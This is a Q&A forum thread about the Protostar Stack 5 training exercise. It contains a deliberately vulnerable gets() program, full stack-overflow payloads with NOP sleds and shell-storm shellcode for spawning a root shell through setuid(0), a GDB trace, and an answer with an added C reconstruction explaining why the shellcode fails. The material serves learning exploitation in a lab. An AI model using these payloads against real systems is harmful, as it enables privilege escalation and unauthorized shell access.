
I'm playing with a basic buffer overflow, Protostar Stack 5.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

//gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -m32 -g bof2.c -o bof2
//sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
//(on a current glibc/gcc add -std=gnu99 so that gets() is still declared)


int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);   /* deliberately unbounded read: the overflow target */
  return 0;
}

Then I try a simple shellcode: http://shell-storm.org/shellcode/files/shellcode-811.php

So the final payload looks like this:

(python -c "print 'A'*72+'\xf4\xd1\xff\xff'+'\x90'*200+'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'"; tee) | ./protostar-stack5

It works as expected: when I type id on STDIN, STDOUT shows my current id, and so on.

Now I want to try a shellcode with SETUID(0); here is the link: http://shell-storm.org/shellcode/files/shellcode-598.php

So my final payload will be:

(python -c "print 'A'*72+'\xf4\xd1\xff\xff'+'\x90'*200+'\x31\xdb\x8d\x43\x17\xcd\x80\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"; tee) | ./protostar-stack5

When I type id on STDIN I get a Segmentation Fault.

So I decided to check by stepping from the NOPs into the shellcode inside GDB:

   0xffffd235:  nop
   0xffffd236:  nop
   0xffffd237:  nop
=> 0xffffd238:  xor    ebx,ebx ; Start of Shellcode
   0xffffd23a:  lea    eax,[ebx+0x17]
   0xffffd23d:  int    0x80
   0xffffd23f:  push   ebx
   0xffffd240:  push   0x68732f6e
   0xffffd245:  push   0x69622f2f
   0xffffd24a:  mov    ebx,esp
   0xffffd24c:  push   eax
   0xffffd24d:  push   ebx
   0xffffd24e:  mov    ecx,esp
   0xffffd250:  cdq    
   0xffffd251:  mov    al,0xb
=> 0xffffd253:  int    0x80  ; End of shellcode
   0xffffd255:  add    bh,bh ; Still executed
   0xffffd257:  dec    DWORD PTR [ebx-0x25] ; Still executed
   0xffffd25a:  (bad)  ; Still executed; this causes the segmentation fault
   0xffffd25b:  jmp    DWORD PTR [edx-0x25]
   0xffffd25e:  (bad)  
   0xffffd25f:  push   DWORD PTR [ebx+ebx*8-0x1]

Legend: code, data, rodata, value
Stopped reason: SIGILL
0xffffd25a in ?? ()

I stepped from the start of the shellcode to its end and got no error, but no shell appears; it keeps executing the instructions after the end of the shellcode, and in the end it segfaults.

I have already set the SUID bit on the compiled program.

So why do I get a segmentation fault instead of a shell?

Why are the instructions after INT 80 still executed? This is different from the basic shellcode, which gives me a shell after INT 80 is executed.

What should I do to make my payload containing SETUID(0) work as expected?

PS: I wanted to ask this, but fortunately it worked by the time I finished writing the question. Any other answer is welcome.

Thanks in advance.

Dark Cyber

1 Answer


Don't forget to set the compiled program's owner to root (sudo chown root ./filename), and don't forget to set the SUID bit (chmod u+s ./filename), because your payload contains SETUID(0).

Dark Cyber
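Root ownership matters because of how shellcode-598 is written, and the same detail explains why the GDB trace in the question falls through the second INT 0x80 instead of giving a shell. The C below is an added example written for this page (it is not code from the question, the answer, or shell-storm): it reconstructs the register and stack state from the disassembly above and replays the two steps in portable C. The struct and function names are this example's own, the argv layout is simplified for a 64-bit build as noted in the comments, and raw return values follow the Linux convention of 0 on success and -errno on failure.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * State that shellcode-598 leaves behind, reconstructed from the
 * disassembly in the question (names and struct layout are this example's):
 *
 *   xor ebx,ebx ; lea eax,[ebx+0x17] ; int 0x80   eax = raw result of setuid(0)
 *   push ebx ; push "n/sh" ; push "//bi"          "//bin/sh\0" on the stack
 *   mov ebx,esp                                   ebx = path
 *   push eax ; push ebx ; mov ecx,esp             argv = { path, eax, ... }
 *   cdq                                           edx = envp = sign of eax
 *   mov al,0xb ; int 0x80                         intended: execve(path, argv, envp)
 *
 * Linux returns 0 on success and -errno on failure, and the code never tests
 * that value. For an unprivileged process setuid(0) gives -EPERM, which is -1
 * (0xffffffff): it is reused as argv[1], as envp via cdq, and, because
 * "mov al,0xb" only overwrites the low byte, as the top 24 bits of the
 * syscall number.
 */

/* Syscall number sitting in eax when the second int 0x80 executes. */
uint32_t shellcode_syscall_nr(long raw_setuid_ret)
{
    return ((uint32_t)raw_setuid_ret & 0xffffff00u) | 0x0bu;   /* 11 only if eax was 0 */
}

struct shellcode_execve {
    const char *path;
    const char *argv[3];   /* on the real 32-bit stack argv[2] would be the "//bi"
                              bytes; a NULL stand-in keeps this portable and does
                              not change the outcome */
    char *const *envp;
};

/* Build the execve arguments exactly as the shellcode does for a given raw
 * setuid(0) result (0 or -errno). */
static struct shellcode_execve build_args(long raw_setuid_ret)
{
    struct shellcode_execve a;
    a.path = "//bin/sh";
    a.argv[0] = a.path;                                     /* push ebx */
    a.argv[1] = (const char *)(intptr_t)raw_setuid_ret;     /* push eax */
    a.argv[2] = NULL;
    a.envp = raw_setuid_ret < 0 ? (char *const *)(intptr_t)-1 : NULL;  /* cdq */
    return a;
}

/* 1 if argv is NULL-terminated after argv[0] and envp is NULL (what the
 * shellcode author assumed), 0 otherwise. */
int shellcode_args_valid(long raw_setuid_ret)
{
    struct shellcode_execve a = build_args(raw_setuid_ret);
    return a.argv[1] == NULL && a.envp == NULL;
}

/* setuid(0) reported the way the kernel reports it to the shellcode: 0 or -errno. */
long raw_setuid0(void)
{
    return setuid(0) == 0 ? 0 : -(long)errno;
}

/* execve with the shellcode's arguments. Returns errno on failure; on
 * success the process is replaced and this never returns. The real shellcode
 * only reaches execve at all when shellcode_syscall_nr() == 11. */
int execve_like_shellcode(long raw_setuid_ret)
{
    struct shellcode_execve a = build_args(raw_setuid_ret);
    execve(a.path, (char *const *)a.argv, a.envp);
    return errno;
}

int main(void)
{
    long r = raw_setuid0();
    uint32_t nr = shellcode_syscall_nr(r);

    printf("setuid(0) raw result: %ld (%s)\n", r, r == 0 ? "ok" : strerror((int)-r));
    if (nr != 11) {
        printf("second int 0x80 would run syscall 0x%x, not 11: the kernel answers "
               "-ENOSYS and execution falls through past the shellcode\n", (unsigned)nr);
        printf("a direct execve with those argv/envp fails too: %s\n",
               strerror(execve_like_shellcode(r)));
        return 1;
    }
    execve_like_shellcode(r);   /* as root or via a root-owned SUID binary: /bin/sh */
    return 1;
}
```

Run as an ordinary user this reports setuid(0) = -1, a syscall number of 0xffffff0b (so the kernel returns -ENOSYS and the CPU simply continues into the bytes after the shellcode, which is the `add bh,bh` / `(bad)` / SIGILL sequence in the trace), and EFAULT for the execve that would have followed. Run as root, or from a root-owned binary with the SUID bit set, eax is 0 after setuid, the syscall number is 11, argv is `{"//bin/sh", NULL}`, envp is NULL, and /bin/sh starts. One caveat on the debugging method in the question: when an unprivileged gdb starts a SUID binary the kernel does not grant the elevated uid to the traced process, so single-stepping the shellcode will always show the failing path even after the chown and chmod; test the privileged path outside the debugger.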